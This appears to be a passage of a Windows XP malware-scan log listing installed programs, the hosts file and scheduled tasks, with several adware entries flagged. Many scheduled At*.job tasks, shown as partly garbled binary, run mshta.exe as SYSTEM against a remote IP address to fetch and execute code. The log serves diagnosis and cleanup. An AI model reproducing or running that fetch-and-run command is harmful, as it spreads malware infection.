CyberLink PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 7.0.3409.a - PowerDVDCorp.)
CyberLink YouCam 3.1 (HKLM\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.1.5324 - CyberLink Corp.)
CyberLink YouCam 3.1 (Version: 3.1.5324 - CyberLink Corp.) Hidden
Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
DVD to VCD AVI DivX Converter v3.2 (build 069) (HKLM\...\DVD to VCD AVI DivX Converter v3.2 (build 069)) (Version:  - )
eMachines Games (HKLM\...\WildTangent emachines Master Uninstall) (Version: 1.0.0.52 - WildTangent)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3005 - Acer Incorporated)
FFmpeg 2009-01-08 for Audacity (HKLM\...\FFmpeg for Audacity_is1) (Version:  - )
FFmpeg for Audacity on Windows (HKLM\...\FFmpeg for Audacity on Windows_is1) (Version:  - )
FLV Player 2.0 (build 25) (HKLM\...\FLV Player) (Version: 2.0 (build 25) - Martijn de Visser)
Free FTP (HKLM\...\freeftp) (Version:  - )
Free Ride Games Player (HKLM\...\{2B7BDADB-EC8C-4C54-B5DD-CE45A016D3A7}) (Version:  - )
Freecorder (HKLM\...\Freecorder4.1) (Version: 4.1 - Applian Technologies Inc.)
GIMP 2.6.10 (HKLM\...\WinGimp-2.0_is1) (Version: 2.6.10 - The GIMP Team)
Google Chrome (HKLM\...\Google Chrome) (Version: 31.0.1650.63 - Google Inc.)
Google Desktop (HKLM\...\Google Desktop) (Version: 5.8.0809.23506 - Google)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (Version: 1.3.22.3 - Google Inc.) Hidden
ieSpell (HKLM\...\ieSpell) (Version: 2.6.4 (build 573) - Red Egg Software)
Java Auto Updater (Version: 2.0.7.2 - Sun Microsystems, Inc.) Hidden
Java 6 Update 37 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216035FF}) (Version: 6.0.370 - Oracle)
Jokosher version 0.11.4 (HKLM\...\Jokosher_is1) (Version:  - )
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
LAME v3.98.2 for Audacity (HKLM\...\LAME for Audacity_is1) (Version:  - )
Magic Encyclopedia (HKLM\...\exent_605350) (Version:  - )
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Base Smart Card Cryptographic Service Provider Package (HKLM\...\KB909520) (Version:  - Microsoft Corporation)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.4.0304.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.4.304.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Text-to-Speech Engine 4.0 (English) (HKLM\...\MSTTS) (Version:  - )
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{527BBE2F-1FED-3D8B-91CB-4DB0F838E69E}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 27.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 27.0.1 (x86 en-US)) (Version: 27.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 27.0.1 - Mozilla)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
Norton Security Scan (HKLM\...\NSS) (Version: 2.3.0.44 - Symantec Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version:  - )
Optimizer Pro v3.2 (HKLM\...\Optimizer Pro_is1) (Version:  - PC Utilities Software Limited) <==== ATTENTION
RealPlayer (HKLM\...\RealPlayer 12.0) (Version:  - RealNetworks)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.5628 - Realtek Semiconductor Corp.)
RealUpgrade 1.0 (Version: 1.0.0 - RealNetworks, Inc.) Hidden
Re-Markable (HKLM\...\3ab10bee-8869-4359-a475-bb66899cdbdc) (Version:  - ReMarkable) <==== ATTENTION
Segoe UI (Version: 14.0.4327.805 - Microsoft Corp) Hidden
Spell Checker For OE 2.1 (HKLM\...\Spell Checker For OE 2.1) (Version:  - )
The Treasures of Montezuma (HKLM\...\exent_466550) (Version:  - )
Ulead GIF Animator 5 TBYB (HKLM\...\{8AF3E926-ED59-11D4-A44B-0000E86D2305}) (Version:  - Ulead System)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM\...\{0A0CADCF-78DA-33C4-A350-CD51849B9702}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM\...\{0A0CADCF-78DA-33C4-A350-CD51849B9702}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_HOMESTUDENTR_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_HOMESTUDENTR_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_HOMESTUDENTR_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_HOMESTUDENTR_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Windows Internet Explorer 8 (KB2598845) (HKLM\...\KB2598845-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB973874) (HKLM\...\KB973874-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB976662) (HKLM\...\KB976662-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB980182) (HKLM\...\KB980182-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2492386) (HKLM\...\KB2492386) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2661254-v2) (HKLM\...\KB2661254-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2718704) (HKLM\...\KB2718704) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2736233) (HKLM\...\KB2736233) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
Virtual Villagers 2 (HKLM\...\exent_629350) (Version:  - )
VLC media player 2.1.3 (HKLM\...\VLC media player) (Version: 2.1.3 - VideoLAN)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Defender (HKLM\...\{A06275F4-324B-4E85-95E6-87B2CD729401}) (Version: 1.1.1593.21 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 7 (Version: 20070813.185237 - Microsoft Corporation) Hidden
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Live Call (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Mail (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8051.1204 - Microsoft Corporation) Hidden
Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Management Framework Core (HKLM\...\KB968930) (Version:  - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
XP Codec Pack (HKLM\...\XP Codec Pack) (Version:  - )
Yahoo! Messenger (HKLM\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
YASA Audio/Data/Video CD Burner v4.3.90 (HKLM\...\YASA Audio/Data/Video CD Burner v4.3.90) (Version:  - )
Yontoo Layers Runtime 1.10.01 (HKLM\...\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}) (Version: 1.10.01 - Yontoo LLC) <==== ATTENTION
Zip Opener Packages (HKCU\...\Zip Opener Packages) (Version:  - ) <==== ATTENTION

==================== Restore Points  =========================

19-03-2014 14:48:42 System Checkpoint
20-03-2014 13:05:41 Software Distribution Service 3.0

==================== Hosts content: ==========================

2009-03-13 11:15 - 2008-04-14 08:00 - 00000734 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\At1.job => mA¦&ÓâHŽÆsÑb_XF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
SKR
“â¦üÛ3øÀ-¯BÄâmåÓTß_:XÄ­hK'ó‰PÔÀ‰þŠgÕcàxY“zTD@/A„
Task: C:\WINDOWS\Tasks\At10.job => gãáÁH„)ææÐF!<
 s !Þ    
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
    Ð^Ð=æÌC1–pñ
o¬$ê…Ù©Í(é2žØêU…8Ÿ«J”›5,$J…e»4µîwÚ¥¾ª¨=ûÚÁ‘…LÐ9Û
Task: C:\WINDOWS\Tasks\At11.job => Îú‡J›é¿V,2tæF!<
 s !Þ

mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú

À@u§¯ûzÀe}Lú®.eâô¯.
¼Vsº‹7Yl_pžŽ5Ÿ÷L¥bfݹ»©ÅûxÙ(r·=Ê×ÿv
Task: C:\WINDOWS\Tasks\At12.job => 'þºXºKºSg ŠˆÒºF!<
 s !Þ(
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
¡2'´í6è#š¼ü†J¦žÍçõnÖÍýnÖ°ôúWíþ´´‚$R¡çÊøP”*ËkHÛutsÛs;
Task: C:\WINDOWS\Tasks\At13.job => RcXÛ?÷E”]\Ñ&ƒF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
E}×–¤Ú¾1wî‹8bã~ëŒÜü¿ÑÁÊÑ~—‰X†<{ždXúƒðí̉»×ª4z*É—u6¹è¢&ê
Task: C:\WINDOWS\Tasks\At14.job => ˆ}£.'2D¾­=SºxF!<
 s !Þ

mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú

Jåúl“aº‰HQåNµV×b|ÉNÒH[À‹½g¯{{~ÙÅj…ˆñÀ“RýtÅ÷žª‚r®õÕ×Ç•Ñ÷63
Task: C:\WINDOWS\Tasks\At15.job => ¢?D×Íì5Kˆ;
rAuÁƒF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
µØ4€Þ+½øÉLÞ”{7oýçìPËBU+¾Åõq>K>ñÑL‚b)ò–usò8¹¨îË·ÿ5ôœ˜V‘*x
Task: C:\WINDOWS\Tasks\At16.job => 5
FÖQÚyI¤÷CÈË-C‡F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
&ßõ}ʽ3öš ®üY¤ÂÎWUvµL÷õH
KW7YÝ[, TÇ&ÒQà~±¡Ï%’e¹NÀ¿KP[`w
Task: C:\WINDOWS\Tasks\At17.job => Ç‘wªtÿ¸C•Ü3[ìÉ1F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
†Z]‡®»LýdkûjÊ6êíÿY?ŽFåíÇ3Áoµ1¦o#v"çxªÇò€0^;®j={B±’<˜É
Task: C:\WINDOWS\Tasks\At18.job => Áêï–•M°~ŸžÞ‰ªIF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
ÂtéÁÌ_­ƒÈUïaŽÁs2ko[a[ŽH U]ª—Læ³\æ1ÀÔ÷oÊoÀˆÖŒaÈ89¦Åö>
Task: C:\WINDOWS\Tasks\At19.job => *™&›ñ•SDœ"òµÇ"‚F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
ªµè"dðTß[ÿb¤òhŠÌ„&ý•¶=Ôa=£†t`Œµ¦×`[­íÊ£@udäsqgé8`Q‹ÿˆ—
Task: C:\WINDOWS\Tasks\At2.job => Ñ»÷¨N¥Å½„Ž†F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
îW3ø!pgn,’¼sH˜8›ªI­`¢%›ÓÝO^æ7    !&^–]jö•’àž†ÅØ
ž­`'YZšÈÀ·©ÖDš
Task: C:\WINDOWS\Tasks\At20.job => Ä!£GèN†çþñ»9·F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
vထ§ŒáC²$Ô¤,M
åí/·q{:á[g˜ë¸zM+ôÛN£-;¿L@Y¿¾6A ƒ‘Ñ°WÎd
Task: C:\WINDOWS\Tasks\At21.job => ;ÍœKSZB¶„ µ’F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
OŸz“–ÙÇ!DXèfÈEé.š–Ûè}ª\†ÓPœÍëËC€Ý!êðmÕð4ØU†aš6Wë‹Í—Ú€±‰
Task: C:\WINDOWS\Tasks\At22.job => yÆÑûõÖJšÖ|8B¸¢7F!<
 s !Þ.
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
ÝZV¯¿Z*Kw›ÆEP_7ˆ€ žrð]ÐΫù=¢‚Ã#)Œ=4(’3d*ÀÒ"á7`…v    :ŽõÏÊi
Task: C:\WINDOWS\Tasks\At23.job => Y^ëöíH¤_)¯Âq¹F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
h·¾±íÍo‚5B£Ã=µ§A¸««ïWÝ.¸J éûÄ=0ìz½ã‰ÌŒÛÊß    0¬@˜é“`¾IrƒÇfÕ%
Task: C:\WINDOWS\Tasks\At24.job => ÍGcóÜ¢H“ðô]Ý}‰F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
?Õ×vúª duè]DQ7ýiRÒh­å®¤)oˆž€¥ŠÇ“â?—]d©R(¢Èêóu‹ˆh»^¦eü…‹É(
Task: C:\WINDOWS\Tasks\At25.job => C:\DOCUME~1\BUDDYH~1\APPLIC~1\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At26.job => C:\DOCUME~1\BUDDYH~1\APPLIC~1\DIGITA~2\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At27.job => C:\DOCUME~1\NETWOR~1\APPLIC~1\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At3.job => п˜t»y«MŸÑK     íMF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
‰6ßpŒÝ²4ÁpF“¥‰Dµ0&K#JòöVg€ÜÌ|æõ¬‰â€~:4    Ï‚Á/çcO”î§íߦ‡C9À+
Task: C:\WINDOWS\Tasks\At4.job => N¨®ßô E¨%"ÑÁ\xF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
äùi"‚Ò/ŸÓð­TìS±zt‡`èp LêG"îD­6VàJ4k\ÿ¡ÓÆåªm»ï½*zMBn¸BõG
Task: C:\WINDOWS\Tasks\At5.job => ÛöÕ›L¬ÝLåÍòÌÕF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
-,¥O5æ×·;¶nò
sɆWQÕHb]z³(ç<xõ²ÞcCm”Ceå±–ÀEÌŒ•/ÃX(°Íµö0©
Task: C:\WINDOWS\Tasks\At6.job => ƒ¤
pO+¬AˆžEˆ)ع2F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
üϵˆ"Y§’ݘݴKÝ2Yr‚‰d¢•5™QuP˜·}/ÂäY´b    º?"Ÿ]&ØΧ¶Ã7;§ÿ•&
Task: C:\WINDOWS\Tasks\At7.job => þ5>==LCºƒ¡éþ}ÉF!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
Yìì
Á¥îì=²œ®!5Ù‰QOÿ´H¡á’>“7YUévœ¶    d!‹øš¼æ|¼êPuOýŽœù# ¨ìp´WY
Task: C:\WINDOWS\Tasks\At8.job => í1‡]‘—ZO©ƒâŸœK%@F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
XM„rŸNJKádØ
^ãòá†ÎÖ´nFÃ@æ?ñB­œ7óY¦Cûß:ž¶ówEƒ{|ÛÜì]¬²¶;2\Ò
Task: C:\WINDOWS\Tasks\At9.job => eYëoÜM‡=:$Öó•‡F!<
 s !Þ
mshta.exe3http://91.188.59.15/77t.php?olala=4910202039355412SYSTEMCreated by NetScheduleJobAdd.0Ú
g×ÝnªÒÜÎïñi›¾Î]ÅþûƒèH¥!Û1V”'0ØÖÞWc˜ˆÑåð.]†‚̾eÎõT{€"
Task: C:\WINDOWS\Tasks\COMODO System Cleaner Update.job => C:\Program Files\COMODO\COMODO System-Cleaner\UpdateApplications.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
